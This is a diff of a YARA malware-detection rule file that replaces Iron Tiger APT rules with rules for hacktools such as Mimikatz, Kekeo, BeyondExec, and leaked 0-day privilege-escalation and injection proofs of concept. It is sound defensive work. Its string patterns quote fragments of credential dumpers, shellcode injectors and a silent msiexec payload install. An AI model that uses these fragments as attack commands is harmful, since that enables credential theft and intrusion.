+		$x4 = "RklMRSBNT05JVE9SIC0gU1l" fullword ascii
+		$s1 = "WPR.exe" fullword wide
+		$s2 = "Windows Password Recovery" fullword wide
+		$op0 = { 5f df 27 17 89 }
+		$op1 = { 5f 00 00 f2 e5 cb 97 }
+		$op2 = { e8 ed 00 f0 cc e4 00 a0 17 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 20000KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Irontiger_Dnstunnel : FILE
+rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE_64 : FILE
 {
 	meta:
-		description = "This rule detects a dns tunnel tool used in Operation Iron Tiger"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "7f24d3dd-4301-5b12-8262-4cc5f6578a4b"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L65-L84"
+		description = "Windows Password Recovery - file ast64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0f6c7695-e616-5757-b9cd-8cff5f972c3e"
+		date = "2017-03-15"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3605-L3622"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "84b7dec3a89fe309149c7a3141279755adafbf793521c7b9b4031827f1020d7d"
+		logic_hash = "6cdd46609d401b7c12b936de7f64bab0bc45b9d2c6079fae45a96f5be6857b82"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4e1ea81443b34248c092b35708b9a19e43a1ecbdefe4b5180d347a6c8638d055"
 
 	strings:
-		$str1 = "\\DnsTunClient\\" wide ascii
-		$str2 = "\\t-DNSTunnel\\" wide ascii
-		$str3 = "xssok.blogspot" wide ascii
-		$str4 = "dnstunclient" wide ascii
-		$mistake1 = "because of error, can not analysis" wide ascii
-		$mistake2 = "can not deal witn the error" wide ascii
-		$mistake3 = "the other retun one RST" wide ascii
-		$mistake4 = "Coversation produce one error" wide ascii
-		$mistake5 = "Program try to use the have deleted the buffer" wide ascii
+		$s1 = "%B %d %Y  -  %H:%M:%S" fullword wide
+		$op0 = { 48 8d 8c 24 50 22 00 00 e8 bf eb ff ff 4c 8b c7 }
+		$op1 = { ff 15 16 25 01 00 f7 d8 1b }
+		$op2 = { e8 c2 26 00 00 83 20 00 83 c8 ff 48 8b 5c 24 30 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $str* ) ) or ( any of ( $mistake* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Irontiger_EFH3_Encoder : FILE
+rule SIGNATURE_BASE_Beyondexec_Remoteaccess_Tool : FILE
 {
 	meta:
-		description = "Iron Tiger EFH3 Encoder"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "ec30782e-8fe9-5843-9db4-5a3c477b7f25"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L86-L99"
+		description = "Detects BeyondExec Remote Access Tool - file rexesvr.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd68cb45-a46f-53d7-bf52-8f7bd3636d0d"
+		date = "2017-03-17"
+		modified = "2025-04-14"
+		reference = "https://goo.gl/BvYurS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3634-L3652"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e620222f815a6c915e372c11d28c480179fd2abdb139ed6984ca5a7a61b8088c"
+		logic_hash = "6f21ddf04ab0d29549c3d07a45afb3e7648a15b0c81f88b8d7ccccc436ba4084"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3d3e3f0708479d951ab72fa04ac63acc7e5a75a5723eb690b34301580747032c"
 
 	strings:
-		$str1 = "EFH3 [HEX] [SRCFILE] [DSTFILE]" wide ascii
-		$str2 = "123.EXE 123.EFH" wide ascii
-		$str3 = "ENCODER: b[i]: = " wide ascii
+		$x1 = "\\BeyondExecV2\\Server\\Release\\Pipes.pdb" ascii
+		$x2 = "\\\\.\\pipe\\beyondexec%d-stdin" fullword ascii
+		$x3 = "Failed to create dispatch pipe. Do you have another instance running?" fullword ascii
+		$op1 = { 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 80 6f 40 }
+		$op2 = { 6a 40 33 c0 59 bf e0 d8 40 00 f3 ab 8d 0c 52 c1 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( any of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or all of ( $op* ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Getpassword_X64 : FILE
+rule SIGNATURE_BASE_Mimikatz_Gen_Strings : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - GetPassword x64"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "8f55b23f-52fd-5106-9112-6cffa97269ab"
-		date = "2023-01-06"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L101-L119"
+		description = "Detects Mimikatz by using some special strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f4ab5d7-5a9f-55f0-9dda-e2975df582a0"
+		date = "2017-06-19"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3654-L3676"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2adabc629fcd4bc89a015874376daf51b2a367bb13ec25e917e5d899080d8a74"
+		logic_hash = "371e74538a63cfe355ebd31e1ac73cd25e92f3a7ce3f9299e0f3406f2bcb5b01"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "058cc8b3e4e4055f3be460332a62eb4cbef41e3a7832aceb8119fd99fea771c4"
+		hash2 = "eefd4c038afa0e80cf6521c69644e286df08c0883f94245902383f50feac0f85"
+		hash3 = "f35b589c1cc1c98c4c4a5123fd217bdf0d987c00d2561992cbfb94bd75920159"
 
 	strings:
-		$str1 = "(LUID ERROR)" wide ascii
-		$str2 = "Users\\K8team\\Desktop\\GetPassword" wide ascii
-		$str3 = "Debug x64\\GetPassword.pdb" ascii
-		$bla1 = "Authentication Package:" wide ascii
-		$bla2 = "Authentication Domain:" wide ascii
-		$bla3 = "* Password:" wide ascii
-		$bla4 = "Primary User:" wide ascii
+		$s1 = "[*] '%s' service already started" fullword wide
+		$s2 = "** Security Callback! **" fullword wide
+		$s3 = "Try to export a software CA to a crypto (virtual)hardware" fullword wide
+		$s4 = "enterpriseadmin" fullword wide
+		$s5 = "Ask debug privilege" fullword wide
+		$s6 = "Injected =)" fullword wide
+		$s7 = "** SAM ACCOUNT **" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Gtalk_Trojan : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - GTalk Trojan"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "3d72660b-c470-5e63-a83d-990d3c5a696c"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L121-L135"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d3693d1d-6085-5e62-8f0b-dde5b14758b7"
+		date = "2017-07-07"
+		modified = "2025-04-14"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3688-L3709"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b6139d34ad91db2e418668be9ca947442ff614a241f0c1aa61f8334af5421c0"
+		logic_hash = "77d72792d7fcf2c54b36d124448e928f306981296715e583d346ccd101e22fc7"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e10ee278f4c86d6ee1bd93a7ed71d4d59c0279381b00eb6153aedfb3a679c0b5"
+		hash2 = "a5916cefa0f50622a30c800e7f21df481d7a3e1e12083fef734296a22714d088"
+		hash3 = "5b701a5b5bbef7027711071cef2755e57984bfdff569fe99efec14a552d8ee43"
 
 	strings:
-		$str1 = "gtalklite.com" wide ascii
-		$str2 = "computer=%s&lanip=%s&uid=%s&os=%s&data=%s" wide ascii
-		$str3 = "D13idmAdm" wide ascii
-		$str4 = "Error: PeekNamedPipe failed with %i" wide ascii
+		$x1 = "msiexec /f c:\\users\\%username%\\downloads\\" ascii
+		$x2 = "c:\\users\\%username%\\downloads\\bat.bat" fullword ascii
+		$x3 = "\\payload.msi /quiet" ascii
+		$x4 = "\\payload2\\WindowsTrustedRTProxy.sys" wide
+		$x5 = "\\payload2" wide
+		$x6 = "\\payload" wide
+		$x7 = "WindowsTrustedRTProxy.sys /grant:r administrators:RX" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them )
 }
-rule SIGNATURE_BASE_Irontiger_HTTP_SOCKS_Proxy_Soexe : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Exploit : FILE
 {
 	meta:
-		description = "Iron Tiger Toolset - HTTP SOCKS Proxy soexe"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "6ead3d61-c1e3-55d1-894e-ab57bcd09cde"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L137-L152"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "72b8aafd-d79a-5812-90fd-5d5aca109254"
+		date = "2017-07-07"
+		modified = "2025-04-14"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3711-L3725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f262751727de3d47a8d7cdc1f8ba8d92f4f60e22bc4e897bd5e53a8f2c118c95"
+		logic_hash = "12a7a04fdc621242f42107204996e44b1962b5ac5eef4f9b9cbbe0ad52b85676"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "632d35a0bac27c9b2f3f485d43ebba818089cf72b3b8c4d2e87ce735b2e67d7e"
 
 	strings:
-		$str1 = "listen SOCKET error." wide ascii
-		$str2 = "WSAAsyncSelect SOCKET error." wide ascii
-		$str3 = "new SOCKETINFO error!" wide ascii
-		$str4 = "Http/1.1 403 Forbidden" wide ascii
-		$str5 = "Create SOCKET error." wide ascii
+		$x1 = "\\Release\\exploit.pdb" ascii
+		$x2 = "\\favorites\\stolendata.txt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Nbddos_Gh0Stvariant_Dropper : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injectdll : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - NBDDos Gh0stvariant Dropper"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "3610b9e3-45f8-5a8d-8977-817160009818"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L154-L169"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "90a4dca0-4f12-5946-9d5d-0b93bb5a3c5d"
+		date = "2017-07-07"
+		modified = "2022-12-21"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3727-L3745"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e877c52d5cb0067388e9a138f48dcf7d3bd6d7d491eea6acffb2527ba0a906c7"
+		logic_hash = "b0a9bd4fa2d8a1192258b303cb757c8bbce7f6962a1d895f57add8a1c3887799"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "173d3f78c9269f44d069afbd04a692f5ae42d5fdc9f44f074599ec91e8a29aa2"
 
 	strings:
-		$str1 = "This service can't be stoped." wide ascii
-		$str2 = "Provides support for media palyer" wide ascii
-		$str4 = "CreaetProcess Error" wide ascii
-		$bla1 = "Kill You" wide ascii
-		$bla2 = "%4.2f GB" wide ascii
+		$x1 = "\\Release\\InjectDll.pdb" ascii
+		$x2 = "Specify -l to list all IE processes running in the current session" fullword ascii
+		$x3 = "Usage: InjectDll -l|pid PathToDll" fullword ascii
+		$x4 = "Injecting DLL: %ls into PID: %d" fullword ascii
+		$x5 = "Error adjusting privilege %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Plugx_Dosemulator : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Payload_MSI : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - PlugX DosEmulator"
-		author = "Cyber Safety Solutions, Trend Micro - modified by Florian Roth"
-		id = "e601d91d-49e6-5fe9-b70b-fb1fb6c4f059"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L171-L185"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fe32af56-d5a1-5246-a7df-395b9cd02faf"
+		date = "2017-07-07"
+		modified = "2022-12-21"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3747-L3763"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "502adc142b0f7a2980b4b851f2360086cec855b5e9851a6e9afbaba1846d11ed"
+		logic_hash = "7dfc8d2bd871ad6acb7d362a946d34ed1830f42ab625c3d3d9cb512f28ccdb57"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a7c498a95850e186b7749a96004a98598f45faac2de9b93354ac93e627508a87"
 
 	strings:
-		$str1 = "Dos Emluator Ver" wide ascii
-		$str2 = "\\PIPE\\FASTDOS" wide ascii
-		$str3 = "FastDos.cpp" wide ascii
-		$str4 = "fail,error code = %d." wide ascii
+		$s1 = "WShell32.dll" fullword wide
+		$s2 = "Target empty, so account name translation begins on the local system." fullword wide
+		$s3 = "\\custact\\x86\\AICustAct.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $str* )
+		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Irontiger_Plugx_Fastproxy : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injector : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - PlugX FastProxy"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "14e05823-6288-5f02-8060-add51084c446"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L187-L203"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6de89a84-fe16-5064-8cbb-a3b9003f4c0c"
+		date = "2017-07-07"
+		modified = "2025-04-14"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3765-L3785"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6659595f65b445d2bd69b13b8d01c2dd78b5c055fa39f810a61646d9408df2ff"
+		logic_hash = "37ed19fe19d3645adcd5fa7d6f6b3572d2821fdb78a6d0c8afdba6ccecfc8528"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ba0e2119b2a6bad612e86662b643a404426a07444d476472a71452b7e9f94041"
 
 	strings:
-		$str1 = "SAFEPROXY HTServerTimer Quit!" wide ascii
-		$str2 = "Useage: %s pid" wide ascii
-		$str3 = "%s PORT[%d] TO PORT[%d] SUCCESS!" wide ascii
-		$str4 = "p0: port for listener" wide ascii
-		$str5 = "\\users\\whg\\desktop\\plug\\" wide ascii
-		$str6 = "[+Y] cwnd : %3d, fligth:" wide ascii
+		$x1 = "\\Release\\injector.pdb" ascii
+		$x2 = "Cannot write the shellcode in the process memory, error: " fullword ascii
+		$x3 = "/s shellcode_file PID: shellcode injection." fullword ascii
+		$x4 = "/d dll_file PID: dll injection via LoadLibrary()." fullword ascii
+		$x5 = "/s shellcode_file PID" fullword ascii
+		$x6 = "Shellcode copied in memory: OK" fullword ascii
+		$x7 = "Usage of the injector. " fullword ascii
+		$x8 = "KO: cannot obtain the SeDebug privilege." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( any of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Irontiger_Plugx_Server : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe_2 : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - PlugX Server"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "38011a23-3ed7-5f58-a814-2551526b27f3"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L205-L225"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9326bbae-81ee-588e-8581-628b47d348f8"
+		date = "2017-07-07"
+		modified = "2025-04-14"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3787-L3802"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14b3f3b75cf6d042934e6916c99fe41d54065d59be6eb30b3cecc799997ac9d4"
+		logic_hash = "e9ca23e4375674ea189d5e9de015f6a1ae16c30d35378580bdc8f42007b716df"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b4f3787a19b71c47bc4357a5a77ffb456e2f71fd858079d93e694a6a79f66533"
 
 	strings:
-		$str1 = "\\UnitFrmManagerKeyLog.pas" wide ascii
-		$str2 = "\\UnitFrmManagerRegister.pas" wide ascii
-		$str3 = "Input Name..." wide ascii
-		$str4 = "New Value#" wide ascii
-		$str5 = "TThreadRControl.Execute SEH!!!" wide ascii
-		$str6 = "\\UnitFrmRControl.pas" wide ascii
-		$str7 = "OnSocket(event is error)!" wide ascii
-		$str8 = "Make 3F Version Ok!!!" wide ascii
-		$str9 = "PELEASE DO NOT CHANGE THE DOCAMENT" wide ascii
-		$str10 = "Press [Ok] Continue Run, Press [Cancel] Exit" wide ascii
+		$s1 = "\\cmd.exe\" /k wusa c:\\users\\" ascii
+		$s2 = "D:\\gitpoc\\UAC\\src\\x64\\Release\\lpe.pdb" fullword ascii
+		$s3 = "Folder Created: " fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Readpwd86 : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Shellcodegenerator : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - ReadPWD86"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "5db832be-4b8e-536f-8db7-a215a90284e2"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L227-L240"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "49250cbe-7bbd-5462-9324-1a8f350386f3"
+		date = "2017-07-07"
+		modified = "2025-04-14"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3804-L3817"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c188b033aee6b7e811c125af545aa7851cd45ba02e057ee93967fa98d1c13947"
+		logic_hash = "b267a816871c30e9403805b942be25ed8e28ad2fd946f234f6877a65420754d8"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "55c4073bf8d38df7d392aebf9aed2304109d92229971ffac6e1c448986a87916"
 
 	strings:
-		$str1 = "Fail To Load LSASRV" wide ascii
-		$str2 = "Fail To Search LSASS Data" wide ascii
-		$str3 = "User Principal" wide ascii
+		$x1 = "\\Release\\shellcodegenerator.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_Irontiger_Ring_Gh0Stvariant : FILE
+rule SIGNATURE_BASE_Securityxploded_Producer_String : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - Ring Gh0stvariant"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "6858550a-4000-581c-b270-370db8ed1c57"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L242-L257"
+		description = "Detects hacktools by SecurityXploded"
+		author = "Florian Roth (Nextron Systems)"
+		id = "739c4ba1-5126-51cc-a2dd-cdac2737e29a"
+		date = "2017-07-13"
+		modified = "2025-04-14"
+		reference = "http://securityxploded.com/browser-password-dump.php"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3819-L3833"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6df729e3b472d3930f5bc4a1b5b8736567df43b78bec3401f5d41bf7ba30d93b"
-		score = 75
+		logic_hash = "101e0b8b8aeb8ed4314bc07139dcc2b40600fde82ff786d15a15c10692f9aa4a"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59"
 
 	strings:
-		$str1 = "RING RAT Exception" wide ascii
-		$str2 = "(can not update server recently)!" wide ascii
-		$str4 = "CreaetProcess Error" wide ascii
-		$bla1 = "Sucess!" wide ascii
-		$bla2 = "user canceled!" wide ascii
+		$x1 = "http://securityxploded.com" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
+		( uint16( 0 ) == 0x5a4d and all of them )
 }
-rule SIGNATURE_BASE_Irontiger_Wmiexec
+rule SIGNATURE_BASE_Kekeo_Hacktool : FILE
 {
 	meta:
-		description = "Iron Tiger Tool - wmi.vbs detection"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "a3060f50-3594-5da9-98e2-6fa0087451f5"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L259-L276"
+		description = "Detects Kekeo Hacktool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4158da8-fc4d-5dc6-b44c-f5325b3bb8ca"
+		date = "2017-07-21"
+		modified = "2025-04-14"
+		reference = "https://github.com/gentilkiwi/kekeo/releases"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3845-L3860"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7988b993345e13b64e5f02ecd2679fc484b063a4cd2f18b52d00d2dfa34d82cb"
+		logic_hash = "14283064e7c8fcee9cde206d25b43b02876a7a4d5de9da6dab47d7f5ba54f019"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ce92c0bcdf63347d84824a02b7a448cf49dd9f44db2d02722d01c72556a2b767"
+		hash2 = "49d7fec5feff20b3b57b26faccd50bc05c71f1dddf5800eb4abaca14b83bba8c"
 
 	strings:
-		$str1 = "Temp Result File , Change it to where you like" wide ascii
-		$str2 = "wmiexec" wide ascii
-		$str3 = "By. Twi1ight" wide ascii
-		$str4 = "[both mode] ,delay TIME to read result" wide ascii
-		$str5 = "such as nc.exe or Trojan" wide ascii
-		$str6 = "+++shell mode+++" wide ascii
-		$str7 = "win2008 fso has no privilege to delete file" wide ascii
+		$x1 = "[ticket %u] session Key is NULL, maybe a TGT without enough rights when WCE dumped it." fullword wide
+		$x2 = "ERROR kuhl_m_smb_time ; Invalid! Command: %02x - Status: %08x" fullword wide
 
 	condition:
-		2 of ( $str* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_Mal_Lockbit4_Rc4_Win_Feb24 : FILE
+rule SIGNATURE_BASE_Allthethings : FILE
 {
 	meta:
-		description = "Detect the implementation of RC4 Algorithm by Lockbit4.0"
-		author = "0x0d4y"
-		id = "4de48ced-b9fa-4286-aac4-c263ad20d67d"
-		date = "2024-02-13"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit4_rc4_win_feb24.yar#L1-L21"
+		description = "Detects AllTheThings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c3169ca7-3482-5d55-a1d9-6d1c01349922"
+		date = "2017-07-27"
+		modified = "2022-12-21"
+		reference = "https://github.com/subTee/AllTheThings"
